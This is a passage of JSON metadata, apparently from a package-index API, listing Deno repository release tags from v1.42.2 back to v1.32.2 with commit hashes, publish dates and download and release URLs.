hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifest